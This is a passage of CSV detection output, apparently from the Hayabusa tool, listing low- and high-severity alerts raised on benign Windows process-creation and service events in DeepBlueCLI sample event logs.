/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17c4 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 13:21:41.261 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 13:22:15.298 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 13:22:37.732 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1194 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 14:01:57.235 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 14:36:31.003 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1130 | User: IE10WIN7$ | LID: 
0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 15:13:52.245 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 15:21:31.129 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup.msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0xaf0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 15:21:31.333 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 16:10:10.254 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:11:11.262 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:31:55.224 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:31:58.790 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN 
Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x15c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:31:58.886 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:31:59.014 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:32:06.234 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:32:06.344 +00:00,IE10Win7,4688,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_builtin/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:32:06.392 +00:00,IE10Win7,7045,info,Persis,Service Installed,"Name: Mozilla Maintenance Service | Path: ""C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-08-30 17:32:07.392 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0x13ac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 17:48:21.955 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:11:02.272 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:26:31.346 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1560 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:39:02.875 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:39:02.875 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:53:34.038 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11d4 | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:53:34.114 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1284 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:54:17.892 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe18 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:54:17.934 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x880 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:55:17.369 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1670 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:55:17.405 +00:00,IE10Win7,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd58 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:55:29.358 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x8dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:55:29.420 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x748 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:56:17.432 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1788 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:56:17.468 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 
0x8e4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:56:42.015 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:56:42.074 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xfd4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:59:41.893 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xfac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 18:59:41.954 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1798 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 
19:00:08.701 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x14ac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:00:08.738 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1708 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:00:25.559 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf80 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:00:25.615 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:00:45.207 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: 
C:\Windows\System32\eventvwr.exe | PID: 0x298 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:00:45.252 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf44 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:02:16.930 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x4cc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:02:16.995 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1520 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:03:18.080 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11fc | User: IEUser | LID: 
0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:03:18.108 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xaac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 19:06:17.300 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 20:07:47.341 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 20:48:41.903 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 20:49:01.091 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 20:50:48.340 
+00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 20:51:10.630 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 21:03:24.509 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 22:05:29.521 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-30 23:02:21.533 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:06:39.541 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:09:04.159 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: 
C:\Windows\System32\cmd.exe | PID: 0x1064 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:09:04.174 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:11:15.295 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:11:16.100 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1264 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:11:16.210 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:11:29.568 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 
/Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:11:35.821 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1300 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:12:06.943 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-08-31 00:12:06.951 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:06.387 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-01 15:54:06.516 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1100 | User: IE10WIN7$ | LID: 
